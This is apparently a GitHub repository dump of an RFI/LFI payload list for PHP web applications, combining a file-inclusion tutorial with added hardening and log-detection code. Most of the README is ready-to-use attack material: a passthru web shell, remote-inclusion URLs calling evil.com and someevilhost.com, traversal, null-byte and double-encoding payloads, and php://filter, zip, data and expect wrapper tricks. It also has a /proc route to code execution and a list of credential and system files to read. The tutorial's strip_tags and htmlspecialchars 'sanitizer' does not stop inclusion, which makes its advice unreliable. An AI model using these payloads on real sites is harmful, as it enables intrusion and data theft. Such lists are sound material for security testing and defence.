├── .gitignore
├── LICENSE
├── README.md
└── img
    └── rfi-lfi.jpeg
/.gitignore:
--------------------------------------------------------------------------------
1 | # Node rules:
2 | ## Grunt intermediate storage (http://gruntjs.com/creating-plugins#storing-task-files)
3 | .grunt
4 |
5 | ## Dependency directory
6 | ## Commenting this out is preferred by some people, see
7 | ## https://docs.npmjs.com/misc/faq#should-i-check-my-node_modules-folder-into-git
8 | node_modules
9 |
10 | # Book build output
11 | _book
12 |
13 | # eBook build output
14 | *.epub
15 | *.mobi
16 | *.pdf
17 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2019 Payload Box
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ### RFI/LFI Payload List
2 |
11 | As with many exploits, remote and local file inclusion bugs are only a problem on the coder's end; of course, it also takes a second person to exploit them. This article will hopefully give you an idea of how to protect your website, and most importantly your code, from file inclusion exploits. The example code is in PHP.
12 |
13 | Let’s look at some of the code that makes RFI / LFI exploits possible.
14 |
15 | ```
16 | <?php
17 | // Vulnerable: the page name comes straight from the query string into include()
18 | $page = $_GET['page'];
19 | include($page);
20 | ?>
21 | ```
22 |
23 | Obviously this should not be used. The $page input is not sanitized at all; it goes straight into the include on the page, which is a big "NO". Always sanitize any input that arrives from the browser. When the user clicks "Files" to visit "files.php", the request will look like this:
24 |
25 | ```
26 | http://localhost/index.php?page=files.php
27 | ```
28 |
29 | Now, since nothing sanitizes the input in the $page variable, we can point it at whatever we want. If the site is hosted on a Unix/Linux server, we can display the password or shadow file, or configuration files, through the unsanitized variable.
30 |
31 | Viewing files on the server this way is a "Local File Inclusion" or LFI exploit. This is no worse than an RFI exploit, which we look at next.
32 |
33 | ```
34 | http://localhost/index.php?page=../../../../../../etc/passwd
35 | ```
36 |
37 | The include will most likely return the contents of /etc/passwd. Now let's look at the RFI side of this exploit, using the same code we looked at before.
38 |
39 | ```
40 | <?php
41 | // Vulnerable: the same unfiltered include as above
42 | $page = $_GET['page'];
43 | include($page);
44 | ?>
45 | ```
46 | Now suppose we write something like …
47 |
48 | ```
49 | http://localhost/index.php?page=http://google.com/
50 | ```
51 |
52 | Wherever the $page variable was originally placed on the page, we now get the google.com homepage. This is where the coder gets hurt.
53 | We all know what a c99 shell can do, and if the coder is not careful, one can be included in the page, letting a visitor browse sensitive files and content whenever they like. Let's look at something simpler that can happen to a web page: the quick and dirty use of RFI. Now create a file named "test.php", put the following code in it and save it.
54 |
55 | ```
56 | <?php
57 | // The included file simply runs whatever is passed in ?cmd=
58 | passthru($_GET['cmd']);
59 | ?>
60 | ```
62 |
63 | This file is what you include on the vulnerable page through the RFI exploit. The passthru() function in PHP is very dangerous, and many hosts disable it "for security reasons". With this code in test.php, we can send a request to the web page that includes it via the file inclusion exploit:
64 |
65 | ```
66 | http://localhost/index.php?page=http://someevilhost.com/test.php
67 | ```
68 |
69 | Because the included code reads a $_GET parameter, we must also supply the command to pass to passthru(). We can do something like this:
70 |
71 | ```
72 | http://localhost/index.php?page=http://someevilhost.com/test.php?cmd=cat /etc/passwd
73 | ```
74 |
75 | The Unix machine will then dump /etc/passwd using the cat command. Now that we know how the RFI exploit works, we need to know how to stop it: how to make it impossible for anyone to execute commands or include remote pages on your server. First, we can disable passthru(). But anything else on your site could still use it (hopefully not), and that is only one thing you can do. I suggest sanitizing the inputs, as I said before. Instead of passing variables straight to the page, we can wrap them in a few of PHP's built-in functions. To start with, chop(), adapted to PHP from Perl, strips whitespace from the end of its input. We can use it like this:
76 | ```
77 | <?php
78 | // chop() only strips trailing whitespace; "../", a null byte and "http://" all pass through untouched
79 | $page = chop($_GET['page']);
80 | include($page);
81 | ?>
82 | ```
83 |
84 | There are many functions that can sanitize a string: htmlspecialchars(),
85 | htmlentities(), stripslashes() and more. To avoid confusion, I prefer to use my own function. We can write a PHP function that does all the cleaning for you; here is something quick and easy I prepared for this purpose.
86 |
87 | ```
88 | <?php
89 | function cleanAll($input) { // strip HTML tags, then escape special characters
90 |     $input = strip_tags($input);
91 |     $input = htmlspecialchars($input);
92 |     return $input;
93 | }
94 | ?>
95 | ```
96 |
97 | I hope you can see what is going on inside this function, so you can add your own steps to it. I would also suggest the str_replace() function, and there are plenty of other functions for sanitizing input. Be considerate and stop the RFI & LFI exploit frenzy!
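
One caveat a practitioner needs here: none of chop(), strip_tags() or htmlspecialchars() removes "../", a null byte or a "http://" / "php://" prefix, so a string-cleaning function alone does not close the include() hole shown above. The check that does is an allowlist of includable pages plus a realpath() containment test. The following is an added example written for this README, not code from the original article; the pages/ directory, the allowlist entries (home, files, about) and the 404 handling are assumptions for the example.

```php
<?php
// Added example (not from the original article): a hardened replacement for
//   $page = $_GET['page']; include($page);
// The ?page= value is only ever used as a key into an allowlist, so traversal,
// null bytes, remote URLs and php:// wrappers never reach include().
// PAGES_DIR and the allowlist entries are assumed for this example.

declare(strict_types=1);

// Directory that holds every page that may be included (assumed layout).
const PAGES_DIR = __DIR__ . '/pages';

// Allowlist: the only accepted ?page= values, mapped to real files.
const PAGE_ALLOWLIST = [
    'home'  => 'home.php',
    'files' => 'files.php',
    'about' => 'about.php',
];

/**
 * Resolve a user-supplied page name to an absolute path inside PAGES_DIR,
 * or return null when the request must be refused.
 */
function resolvePage(string $requested): ?string
{
    // 1. Allowlist lookup: anything not literally in the map is rejected.
    if (!array_key_exists($requested, PAGE_ALLOWLIST)) {
        return null;
    }

    // 2. Defence in depth: the mapped file must still resolve to a real path
    //    under PAGES_DIR (guards against a symlink or a bad allowlist entry).
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGE_ALLOWLIST[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$requested = (isset($_GET['page']) && is_string($_GET['page'])) ? $_GET['page'] : 'home';
$path = resolvePage($requested);

if ($path === null) {
    http_response_code(404);
    // Log the rejected value for the defenders (hex-encoded so a null byte or
    // control character cannot mangle the log); never echo it back unescaped.
    error_log('Rejected page parameter: ' . bin2hex($requested));
    exit('Page not found');
}

include $path;
```

Pair this with the php.ini settings `allow_url_include = Off` (off by default since PHP 5.2) and `allow_url_fopen = Off` where the application does not need them, and with `open_basedir` restricted to the web root: then even a bug elsewhere in the code cannot include a remote file or read outside the allowed directory.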
98 |
99 | #### Basic LFI (null byte, double encoding and other tricks) :
100 |
101 | ```
102 | http://example.com/index.php?page=etc/passwd
103 | http://example.com/index.php?page=etc/passwd%00
104 | http://example.com/index.php?page=../../etc/passwd
105 | http://example.com/index.php?page=%252e%252e%252f
106 | http://example.com/index.php?page=....//....//etc/passwd
107 | ```
108 |
109 | Interesting files to check out :
110 |
111 | ```
112 | /etc/issue
113 | /etc/passwd
114 | /etc/shadow
115 | /etc/group
116 | /etc/hosts
117 | /etc/motd
118 | /etc/mysql/my.cnf
119 | /proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the file descriptor)
120 | /proc/self/environ
121 | /proc/version
122 | /proc/cmdline
123 | ```
124 |
125 | #### Basic RFI (null byte, double encoding and other tricks) :
126 |
127 | ```
128 | http://example.com/index.php?page=http://evil.com/shell.txt
129 | http://example.com/index.php?page=http://evil.com/shell.txt%00
130 | http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
131 | ```
132 |
133 | #### LFI / RFI Wrappers :
134 |
135 | LFI via the php://filter wrapper (rot13 and base64 filters); the wrapper name is case insensitive.
136 |
137 | ```
138 | http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
139 | http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
140 | http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
141 |
142 | Can be chained with a compression wrapper.
143 | http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
144 | ```
145 |
146 | #### LFI Wrapper ZIP :
147 |
148 | ```
149 | echo "" > payload.php;
150 | zip payload.zip payload.php;
151 | mv payload.zip shell.jpg;
152 | rm payload.php
153 |
154 | http://example.com/index.php?page=zip://shell.jpg%23payload.php
155 | ```
156 |
157 | #### RFI Wrapper DATA with "" payload :
158 |
159 | ```
160 | http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
161 | ```
162 |
163 | #### RFI Wrapper EXPECT :
164 |
165 | ```
166 | http://example.com/index.php?page=php:expect://id
167 | http://example.com/index.php?page=php:expect://ls
168 | ```
169 |
170 | #### XSS via RFI/LFI with "" payload :
171 |
172 | ```
173 | http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
174 | ```
175 |
176 | #### LFI to RCE via /proc/*/fd :
177 |
178 | 1. Upload a lot of shells (for example : 100)
179 | 2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD with $PID = PID of the process (can be brute-forced) and $FD the file descriptor (can be brute-forced too)
180 |
181 | #### LFI to RCE via Upload :
182 |
183 | ```
184 | http://example.com/index.php?page=path/to/uploaded/file.png
185 | ```
186 |
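Every trick catalogued above (traversal, null byte, double encoding, the `....//` variant, case-mangled `php://filter`, `zip://`, `data:`, `expect://`, remote URLs and `/proc` reads) leaves a recognisable trace in the web server's access log. The script below is an added example written for this README, not part of the original payload list: it decodes each request target repeatedly so that double encoding collapses to the literal characters, then matches the indicators from the lists above. The log format (combined style), the rule names and the sample log lines are constructed for the example.

```php
<?php
// Added example (not from the original list): flag LFI/RFI indicators from the
// payload lists above in access-log lines. Rule names, the log format and the
// sample lines are assumptions constructed for this example, not real traffic.

declare(strict_types=1);

/**
 * Decode percent-encoding repeatedly so that double encoding (%252e%252e%252f)
 * and ordinary single encoding both end up as the literal characters.
 */
function decodeTarget(string $target, int $maxRounds = 3): string
{
    $out = $target;
    for ($i = 0; $i < $maxRounds; $i++) {
        $next = rawurldecode($out);
        if ($next === $out) {
            break;
        }
        $out = $next;
    }
    return $out;
}

// Regexes applied to the fully decoded request target; each one corresponds to
// a trick shown in the payload list above.
const LFI_RFI_RULES = [
    'path traversal'   => '~\.\.[/\\\\]~',
    'null byte'        => '~\x00~',
    'remote url (rfi)' => '~=\s*(?:https?|ftp)://~i',
    'php wrapper'      => '~\b(?:php|zip|phar|expect|glob|file)://|\bdata:~i',
    'sensitive file'   => '~(?:^|[/=])(?:etc/(?:passwd|shadow|group|issue|hosts|motd|mysql/my\.cnf)'
                        . '|proc/(?:version|cmdline|(?:self|\d+)/(?:environ|fd/\d+)))\b~i',
];

/** Extract the request target ("/index.php?page=...") from a combined-format log line. */
function requestTarget(string $line): ?string
{
    if (preg_match('~"(?:GET|POST|HEAD|PUT) (\S+) HTTP/~', $line, $m) === 1) {
        return $m[1];
    }
    return null;
}

/** Return the names of every rule that fires for one log line. */
function scanLine(string $line): array
{
    $target = requestTarget($line);
    if ($target === null) {
        return [];
    }
    $decoded = decodeTarget($target);
    $hits = [];
    foreach (LFI_RFI_RULES as $name => $regex) {
        if (preg_match($regex, $decoded) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

/** Scan a whole log; returns [line index => rule names] for suspicious lines only. */
function scanLog(array $lines): array
{
    $report = [];
    foreach ($lines as $i => $line) {
        $hits = scanLine($line);
        if ($hits !== []) {
            $report[$i] = $hits;
        }
    }
    return $report;
}

// Constructed sample log lines (203.0.113.0/24 is a documentation address range).
$sampleLog = [
    '203.0.113.5 - - [10/Oct/2019:13:55:36 +0000] "GET /index.php?page=files.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2019:13:55:40 +0000] "GET /index.php?page=../../etc/passwd HTTP/1.1" 200 1024',
    '203.0.113.5 - - [10/Oct/2019:13:55:41 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd%00 HTTP/1.1" 200 1024',
    '203.0.113.5 - - [10/Oct/2019:13:55:42 +0000] "GET /index.php?page=....//....//etc/passwd HTTP/1.1" 200 1024',
    '203.0.113.5 - - [10/Oct/2019:13:55:43 +0000] "GET /index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php HTTP/1.1" 200 2048',
    '203.0.113.5 - - [10/Oct/2019:13:55:44 +0000] "GET /index.php?page=http://evil.com/shell.txt HTTP/1.1" 200 64',
    '203.0.113.5 - - [10/Oct/2019:13:55:45 +0000] "GET /index.php?page=/proc/self/environ HTTP/1.1" 200 4096',
    '203.0.113.5 - - [10/Oct/2019:13:55:46 +0000] "GET /index.php?page=zip://shell.jpg%23payload.php HTTP/1.1" 200 64',
];

// The first (benign) line produces no report entry; every other line is flagged.
foreach (scanLog($sampleLog) as $i => $hits) {
    echo sprintf("line %d: %s\n", $i + 1, implode(', ', $hits));
}
```

Decoding before matching is the important design choice: a rule that only looks for the literal string `../` misses `%252e%252e%252f`, and one that only looks for `php://` misses `pHp://`, which is why the wrapper rule is case insensitive. In production, feed the same rules the `page` parameter at request time (rejecting before include() runs) as well as the logs afterwards; the allowlist approach shown earlier remains the actual fix, and this detector is the monitoring layer around it.
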
187 | #### References :
188 |
189 | 👉 [Testing for Local File Inclusion](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
190 |
191 | 👉 [Wikipedia](https://www.wikipedia.org/wiki/Local_File_Inclusion)
192 |
193 | 👉 [Remote File Inclusion](http://projects.webappsec.org/w/page/13246955/Remote%20File%20Inclusion)
194 |
195 | 👉 [Wikipedia: "Remote File Inclusion"](http://en.wikipedia.org/wiki/Remote_File_Inclusion)
196 |
197 | 👉 [PHP File Inclusion](https://www.owasp.org/index.php/PHP_File_Inclusion)
198 |
--------------------------------------------------------------------------------
/img/rfi-lfi.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/payloadbox/rfi-lfi-payload-list/e0c530899c7e1d9ff63f7483cc2b6e077f6bffd1/img/rfi-lfi.jpeg
--------------------------------------------------------------------------------